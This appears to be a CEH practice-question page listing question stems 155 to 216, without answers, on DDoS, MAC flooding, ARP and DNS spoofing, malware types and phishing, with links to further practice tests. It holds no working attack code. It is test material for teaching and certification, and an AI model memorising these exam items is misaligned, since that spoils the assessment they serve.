Question 155easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security administrator notices that the network switch is broadcasting traffic to all ports as if it were a hub. The switch logs show a sudden flood of packets with random MAC addresses. Which attack is MOST likely occurring?

Question 156mediummultiple choice
Read the full NAT/PAT explanation →

A malware analyst wants to examine a suspicious executable without executing it. The goal is to extract strings, view the PE header, and check for known signatures. Which approach is the analyst using?

Question 157mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization experiences a DDoS attack where the attacker sends a flood of UDP packets to a server, causing it to become unresponsive. The packets appear to come from many different source IP addresses and are directed to random high-numbered ports. Which type of DDoS attack is this?

Question 158hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A SOC analyst observes a high number of incomplete TCP connections with the SYN flag set but no corresponding ACK from the target. The source IPs are spoofed and the connections are targeting port 80 on a web server. Which DDoS mitigation technique would be MOST effective in this scenario?

Question 159easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is characterized by encrypting a victim's files and demanding a ransom payment for the decryption key?

Question 160mediummultiple choice
Read the full DNS explanation →

A penetration tester uses a tool to perform a man-in-the-middle attack by sending forged DNS responses that redirect users to a malicious website. Which tool is MOST likely being used to perform DNS spoofing?

Question 161hardmultiple choice
Read the full NAT/PAT explanation →

During a forensic investigation, an analyst finds a suspicious file that changes its code signature each time it replicates. The file uses encryption and polymorphism to evade signature-based detection. Which type of virus is this?

Question 162mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An employee receives a text message claiming to be from the company's IT department, stating that their account will be suspended unless they click a link to verify their credentials. Which type of social engineering attack is this?

Question 163mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a SYN flood attack? (Select 2)

Question 164hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are common methods used to mitigate DDoS attacks? (Select 3)

Question 165mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application layer (Layer 7) DDoS attacks? (Select 2)

Question 166easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst receives an email from what appears to be the company's CEO requesting an urgent wire transfer. The email address is slightly misspelled (e.g., ce0@company.com instead of ceo@company.com). Which type of social engineering attack is this?

Question 167mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?

Question 168mediummultiple choice
Review the full subnetting walkthrough →

A penetration tester needs to perform ARP poisoning to intercept traffic between two hosts on the same subnet. Which tool would be the most appropriate choice for this task?

Question 169hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a ransomware incident response, a forensic analyst recovers a suspicious file that appears to be a PE executable. The analyst wants to quickly check if the file is known malware without executing it. Which of the following is the BEST first step?

Question 170easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which type of malware is designed to encrypt files on a victim's system and demand payment for the decryption key?

Question 171mediummultiple choice
Read the full DNS explanation →

A security team wants to mitigate a DNS amplification DDoS attack. Which of the following techniques would be MOST effective in preventing the attack from leveraging open DNS resolvers?

Question 172mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, an attacker gains access to a system and wants to maintain persistent remote control. Which type of Trojan is specifically designed for this purpose?

Question 173hardmultiple choice
Review the full subnetting walkthrough →

A security analyst observes the following in a packet capture: a single source IP sends a large number of ICMP echo request packets to the broadcast address of a subnet, with the source IP spoofed to be the target victim. Which type of attack is being executed?

Question 174easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which of the following is a characteristic of a polymorphic virus?

Question 175mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker uses the Social Engineering Toolkit (SET) to send a malicious email to employees of a company, claiming to be from IT support and urging them to click a link to reset their password. Which social engineering attack is being performed?

Question 176hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An analyst runs the following command: `tcpdump -i eth0 src host 192.168.1.10 and dst port 80 -w http_traffic.pcap`. What is the primary purpose of this command?

Question 177mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A company wants to protect its network from MAC flooding attacks. Which of the following countermeasures is MOST effective?

Question 178mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of application layer DDoS attacks? (Select two.)

Question 179hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are techniques used in session hijacking? (Select three.)

Question 180easymulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are types of malware analysis? (Select two.)

Question 181mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst observes a sudden flood of ICMP echo request packets from multiple external IPs to a single internal server. The packets have varying sizes and spoofed source addresses. Which type of attack is MOST likely occurring?

Question 182easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool is specifically designed to create fake login pages for phishing campaigns and can be integrated with Metasploit?

Question 183hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a forensic investigation, an analyst retrieves a suspicious executable. Running 'strings' reveals no readable text, and VirusTotal shows zero detections. However, when executed in a sandbox, the binary connects to a remote IP and injects code into 'explorer.exe'. Which conclusion is MOST accurate?

Question 184mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices that users receive emails from a known vendor requesting urgent payment to a new bank account. The email domain is misspelled (e.g., vvendorfake.com). Which type of social engineering is this?

Question 185easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which malware type is characterized by self-replication across networks without needing a host file?

Question 186mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker gains physical access to a restricted area by following an authorized employee through a secured door without swiping a badge. This technique is known as:

Question 187hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security team detects that an internal host is sending ARP replies claiming to have the IP address of the default gateway. Which tool is MOST likely being used to perform this attack?

Question 188mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which DDoS attack type exploits a small query to a vulnerable service that generates a large response directed at the victim?

Question 189mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user receives a text message claiming their bank account is locked and requiring them to click a link to verify. This social engineering method is called:

Question 190easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which malware analysis approach involves running the suspicious file in a controlled environment to observe its behavior?

Question 191hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A penetration tester uses a tool to perform a MAC flooding attack. What is the intended result of this attack?

Question 192mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

Which tool would an analyst use to capture packets from a network interface and later analyze the pcap file for signs of an attack?

Question 193mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a polymorphic virus? (Choose 2)

Question 194hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are effective DDoS mitigation techniques? (Choose 3)

Question 195mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are techniques used in session hijacking? (Choose 2)

Question 196mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst notices repeated TCP SYN packets sent to a server without corresponding SYN-ACK replies. The source IP addresses are spoofed and appear to be random. Which type of attack is MOST likely occurring?

Question 197easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A user receives an email claiming to be from their bank, asking them to click a link and verify their account credentials. The email contains spelling errors and the link points to a suspicious domain. What type of social engineering attack is this?

Question 198hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, a tester discovers that the target switch's MAC address table is full, causing it to flood traffic out all ports. The tester then captures network traffic using Wireshark on the same segment. Which attack was the tester performing?

Question 199mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An organization wants to mitigate the impact of a DDoS attack that uses large volumes of UDP traffic to exhaust bandwidth. Which of the following techniques would be MOST effective?

Question 200easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst receives an alert indicating that a workstation is sending outbound connections to a known malicious IP address. The analyst suspects a Trojan. Which tool is BEST for performing dynamic analysis of the suspicious binary?

Question 201hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker intercepts a TCP session between a client and a server. By analyzing sequence numbers, the attacker successfully predicts the next sequence number and injects malicious packets. Which attack is being performed?

Question 202mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are characteristics of a polymorphic virus?

Question 203mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO tools are commonly used for ARP poisoning attacks?

Question 204hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are indicators of a slowloris DDoS attack?

Question 205easymulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are types of malware that specifically aim to demand payment from victims?

Question 206mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are examples of amplification attacks used in DDoS?

Question 207hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are techniques used in session hijacking?

Question 208easymulti select
Read the full NAT/PAT explanation →

Which TWO of the following are types of social engineering attacks that rely on impersonation?

Question 209mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which THREE of the following are valid methods for DDoS mitigation?

Question 210hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

Which TWO of the following are features of a Remote Access Trojan (RAT)?

Question 211mediummultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst reviews a sandbox report for a suspicious executable. The report shows that the executable modified the Windows registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to add a new entry pointing to itself. This action is characteristic of which type of malware?

Question 212hardmultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

During a penetration test, you run the tool 'macof' against a switch. After a few seconds, the switch starts flooding frames out all ports. Which attack have you successfully executed, and what is the primary goal of this technique?

Question 213easymultiple choice
Read the full Malware, Social Engineering and Network Attacks explanation →

An attacker sends an email that appears to come from the CEO of the company, requesting an urgent wire transfer to a specific account. This is an example of which social engineering attack?

Question 214mediummulti select
Read the full DNS explanation →

A network administrator notices unusual traffic patterns: the internal DNS server is receiving large DNS queries with the source IP spoofed to appear as the internal DNS server itself. The queries appear to be amplification requests. Which TWO characteristics describe this attack?

Question 215hardmulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

During a forensic investigation, you find a file named 'svch0st.exe' in the startup folder. The file has a suspicious icon and was downloaded from an untrusted source. Analysis shows it opens a backdoor on port 4444 and sends system information to a remote server. Which THREE best describe this malware and its characteristics?

Question 216mediummulti select
Read the full Malware, Social Engineering and Network Attacks explanation →

A security analyst observes a sudden increase in network traffic from many external IPs targeting the company's web server with multiple HTTP GET requests to the same page (/index.php?page=home). The requests appear legitimate but are coming at a very high rate. Which TWO types of attack is the analyst most likely witnessing?

Practice tests

Scored 10-question sessions with instant feedback and explanations.

CEH Practice Test 1 — 10 Questions→CEH Practice Test 2 — 10 Questions→CEH Practice Test 3 — 10 Questions→CEH Practice Test 4 — 10 Questions→CEH Practice Test 5 — 10 Questions→CEH Practice Exam 1 — 20 Questions→CEH Practice Exam 2 — 20 Questions→CEH Practice Exam 3 — 20 Questions→CEH Practice Exam 4 — 20 Questions→Free CEH Practice Test 1 — 30 Questions→Free CEH Practice Test 2 — 30 Questions→Free CEH Practice Test 3 — 30 Questions→CEH Practice Questions 1 — 50 Questions→CEH Practice Questions 2 — 50 Questions→CEH Exam Simulation 1 — 100 Questions→

Practice by domain

Each domain maps to a weighted exam section. Focus on the domain where you are weakest.

Footprinting, Reconnaissance and ScanningEnumeration and System HackingMalware, Social Engineering and Network AttacksWeb Application and Injection AttacksIntroduction to Ethical HackingScanning Networks and EnumerationVulnerability Analysis and System HackingAdvanced Topics: Wireless, Cloud, IoT, CryptographyFootprinting and ReconnaissanceNetwork and Web Application AttacksWireless, IoT and Cloud SecurityCryptography and Malware AnalysisSocial Engineering and Physical Security

Practice by scenario

Filter questions by type — troubleshooting, exhibit, drag-and-drop, PBQ, ACLs, OSPF, and more.

Browse scenarios→

Continue studying

All Malware, Social Engineering and Network Attacks setsAll Malware, Social Engineering and Network Attacks questionsCEH Practice Hub